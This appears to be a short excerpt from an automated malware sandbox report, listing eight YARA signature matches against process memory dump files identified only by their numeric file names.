Source: Yara match File source: 00000004.00000003.2188818191.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2126010864.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128912313.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2166411163.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2157568519.0000000000501000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2116812942.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2088563271.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY